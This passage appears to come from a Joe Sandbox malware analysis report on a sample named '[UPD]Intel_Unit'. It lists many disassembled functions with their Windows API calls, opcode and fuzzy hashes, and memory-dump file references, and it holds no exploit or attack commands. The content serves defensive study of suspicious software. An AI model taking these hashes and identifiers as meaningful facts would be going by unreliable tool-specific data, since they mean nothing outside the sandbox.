                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                              • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                              • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                              • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                              • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                              • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                              • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                                                              • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                              • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID: $@rD
                                                                                                                                                                                                              • API String ID: 3748168415-881980237
                                                                                                                                                                                                              • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                              • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                                                              • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                              • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcatwsprintf
                                                                                                                                                                                                              • String ID: %02x%c$...
                                                                                                                                                                                                              • API String ID: 3065427908-1057055748
                                                                                                                                                                                                              • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                              • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1599320355-0
                                                                                                                                                                                                              • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                              • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                              • String ID: Version
                                                                                                                                                                                                              • API String ID: 512980652-315105994
                                                                                                                                                                                                              • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                              • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
